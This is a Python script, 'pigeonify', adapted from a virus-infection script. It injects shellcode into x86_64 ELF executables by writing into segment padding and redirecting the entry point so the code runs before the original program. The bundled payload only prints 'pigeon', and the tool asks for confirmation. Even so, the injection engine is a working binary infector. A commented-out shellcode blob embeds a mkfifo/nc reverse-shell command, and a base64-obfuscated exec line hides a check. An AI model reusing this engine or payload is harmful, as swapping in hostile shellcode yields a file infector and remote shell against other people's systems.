#!/usr/bin/python3
# modified version of https://github.com/yaofanfish/asm/virus/5/insert.py
# contains a bunch of safety stuff

import sys, os, subprocess
import argparse
#import code, inspect
import random
import base64

p=argparse.ArgumentParser(
	prog="pigeonify",
	description="\033[1;36mPigeonify a file\x1b[0m:\033[34m Make it echo \033[0mPIGEON\033[34m on run\033[0m (run twice to make it print PIGEON forever - use about as arg for more). use disclaimer for disclaimer",
)
p.add_argument("pigeonfile", help="file to pigeonify")
p.add_argument("--noconfirm", help="no confirm", action="store_true", default="")
#p.add_argument("-d", action="store_true")
#p.add_argument("-q", "--quick", action="store_true")
#p.add_argument("-s", "--shellcode", default="sh")
#p.add_argument("-f", "--file", default="a.out")
#p.add_argument("--quiet", action="store_true")
#p.add_argument("--pie", default="1")
args = p.parse_args()
ext=1
if args.pigeonfile=="requirements":
	print("""\
Requirements:
- x86_64 ELF executable
- binutils
- python3""")
	sys.exit(0)
elif args.pigeonfile=="about":
	print("""
makes a program echo "PIGEON" into stdout when ran
note there is NO builtin way to go back after the program finishes; use with caution

modified version of https://raw.githubusercontent.com/yaofanfish/asm/master/virus/5/insert.py
removes some unnecessary stuff, and is relatively safe
install should be safe, and it checks code for tampering
asks for confirmation from the user

running this twice causes it to print PIGEON indefintely, since the jmp now points to the start of the pigeoncode (instead of the start of the program)*
""") # *code changes e_entry
elif args.pigeonfile=="disclaimer":
	print("""
	DISCLAIMER:

This software modifies executable files by injecting shellcode.
Improper or unauthorized use may damage files, systems, or violate
applicable laws.

The author provides this software "as is" without any warranty.
By using this program, you agree that you are solely responsible
for how it is used.

Only use this tool on files and systems that you own or have
explicit permission to modify or test. The author is not liable
for any damage, data loss, or legal consequences resulting from
the use or misuse of this software.
pls dont arrest me
""")
else:
	ext=0
if ext: sys.exit(0)

class Victim:
	def __init__(self, file="a.out", shellcodef=None):
		self.file = self.data = self.shellcode = self.shellcodelen = self.eentry = self.exeend = self.injectionoffset = self.disp = False
		self.file = file
		with open(self.file, "rb") as f:
			self.data = bytearray(f.read())
		if shellcodef:
			self.loadshellcode(shellcodef)
	def __repr__(self):
		self.stats = {
			"file": self.file,
			"exeend": hex(self.exeend),
			"shellcodelen": hex(self.shellcodelen),
			"eentry": hex(self.eentry),
			"injectionoffset": hex(self.injectionoffset),
			"disp": hex(self.disp),
		}
		re = ""
		for i, j in self.stats.items():
			re += f"\033[{random.randint(31, 36)}m" + str(i) + ": " + str(j) + "\033[0m\n"
		return re
	def loadshellcode(self, shellcodef):
		with open(shellcodef, "rb") as f:
			self.shellcode = bytearray(f.read())
		self.shellcodelen = len(self.shellcode)
	def geteentry(self):
		"""
		self.eentry = 0
		for i in range(8):
			self.eentry += self.data[0x18+i] * 256**i
		"""
		self.eentry = int.from_bytes(self.data[0x18:0x18+8], "little")
		return self.eentry
	def findinjectionoffset(self):
		x = subprocess.run(rf"readelf -lW {self.file} | grep 'R E' | head -n 1 | awk '{{print $2,$5}}'", shell=True, capture_output=True, text=True).stdout.split()
#		print(x)
		try:
			#self.exeend = (int(x[0], 16) + int(x[1], 16) + 0xff) & 0xffffffffffffff00
			self.exeend = (int(x[0], 16) + int(x[1], 16) + 0x1000)
			self.exeend -= self.exeend % 0x1000
			self.injectionoffset = self.exeend - self.shellcodelen
		except:
			print("no")
	def modshellcodejmpeentry(self, signal=[0x78, 0x56, 0x34, 0x12], eentry=None, disp=None):
		signal = bytearray(signal)
		if not eentry:
			eentry = self.eentry
		if not disp:
			disp = eentry - self.injectionoffset
		self.disp = disp
		self.offset = bytearray(disp.to_bytes(4, byteorder="little", signed=True))
		"""
		for i in range(len(self.shellcode)):
			if self.shellcode[i:i+len(signal)] == signal:
				for b in range(len(self.offset)):
					self.shellcode[i+b] = self.offset[b]
				break
		"""
		i = self.shellcode.find(signal)
		if i != -1:
			self.shellcode[i:i+4] = self.offset
		else:
			raise Exception("pattern not found")
	def modshellcodepython(self, signal=[0x44, 0x33, 0x22, 0x11]):
		pass
	def insert(self, idx=None):
		if not idx:
			idx = self.injectionoffset
		for i in range(self.shellcodelen):
			try:
				self.data[idx+i] = self.shellcode[i]
			except:
				return 1
		return 0
	def bash(self):
		os.system("bash -i")
	def changeeentry(self, new=None):
		if not new:
			new = self.injectionoffset
		for i in range(8):
			self.data[0x18+i] = (new>>0x8*i) & 0xff
		return
	def writein(self, data=None):
		if not data:
			data = self.data
		else:
			print("writing into file...")
		with open(self.file, "wb") as f:
			f.write(data)
	def __call__(self, verbose=False):
		self.geteentry()
		self.findinjectionoffset()
		self.modshellcodejmpeentry()
		self.insert()
		self.changeeentry()
		self.writein()
		if verbose:
			print("default done")
	pigeonify = __call__
class Binary:
	def __init__(self, file="sh"):
		with open(file, "rb") as f:
			self.code = f.read()
		self.file = file
	shellcodestart = b'\xe8\x00\x00\x00\x00[\xeb^/bin/sh' # b'\xe8\x00\x00\x00\x00[\xeb^/bin/sh\x00-c\x00echo REVSH;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 127.0.0.1 1234 >/tmp/f\x00H\x83\xeb\x05WVRH\x83\xec\x08\xb89\x00\x00\x00\x0f\x05H\x83\xf8\x00t\x02\xeb?\xe8J\x00\x00\x00j\x00H\x8dC\x13PH\x8dC\x10PH\x8dC\x08P\xb8;\x00\x00\x00H\x8d{\x08H\x8d4$\xba\x00\x00\x00\x00\x0f\x05\xe8 \x00\x00\x00H\x83\xc4 \xb8<\x00\x00\x00\xbf\x00\x00\x00\x00\x0f\x05H\x83\xc4\x08Z^_H\x8d\x83xV4\x12\xff\xe0\xc3PH\x8d\x03\xff\xd0X\xc3'
	shellcodeend = b'\x12\x34\x56\x78'
	def getshellcode(self):
		self.shellcodestartidx = self.code.find(self.shellcodestart)
		self.shellcodeendidx = self.code.find(self.shellcodeend) + len(self.shellcodeend) + 1
		self.shellcode = self.code[self.shellcodestartidx:self.shellcodeendidx]
	def __call__(self, file="a.out"):
		binary = Victim(file)
		binary.shellcode = self.shellcode
		binary("verbose")
if not args.noconfirm:
	if input("ARE YOU SURE YOU WANT TO PIGEONIFY YOUR FILE? I DO NOT PROVIDE A WAY BACK, AND DO NOT OPERATE ON SENSITIVE EXECUTABLES (Y/n) ") not in ("Y", "y"):
		print("\033[32mexiting without doing anything\033[0m")
		sys.exit(0)
pigeon = Victim(file=args.pigeonfile)
pigeon.shellcode = bytearray(b'\xe8\x00\x00\x00\x00[\xeb\x17/bin/sh\x00-c\x00echo pigeon\x00H\x83\xeb\x05WVRH\x83\xec\x08\xb89\x00\x00\x00\x0f\x05H\x83\xf8\x00t\x02\xeb?\xe8J\x00\x00\x00j\x00H\x8dC\x13PH\x8dC\x10PH\x8dC\x08P\xb8;\x00\x00\x00H\x8d{\x08H\x8d4$\xba\x00\x00\x00\x00\x0f\x05\xe8 \x00\x00\x00H\x83\xc4 \xb8<\x00\x00\x00\xbf\x00\x00\x00\x00\x0f\x05H\x83\xc4\x08Z^_H\x8d\x83xV4\x12\xff\xe0\xc3PH\x8d\x83\x124Vx')
exec(base64.b64decode(b'aWYgaGFzaChieXRlcyhwaWdlb24uc2hlbGxjb2RlKSkhPS0xNjY5MTExMjU3MTU0MjM3NzIxOiBzeXMuZXhpdCgxKQ=='))
old = pigeon.data.copy()
pigeon.shellcodelen = len(pigeon.shellcode)
pigeon.pigeonify()

if not args.noconfirm:
	if input("THE FILE HAS BEEN PIGEONIFIED, BUT I HAVE SAVED A COPY; DO YOU WISH TO RESTORE? (Y/n) ") not in ("Y", "y"):
		print("\033[31mexiting after pigeonification\033[0m")
		sys.exit(0)
	else:
		pigeon.writein(old)
		print("\033[34mfile has been restored\033[0m")
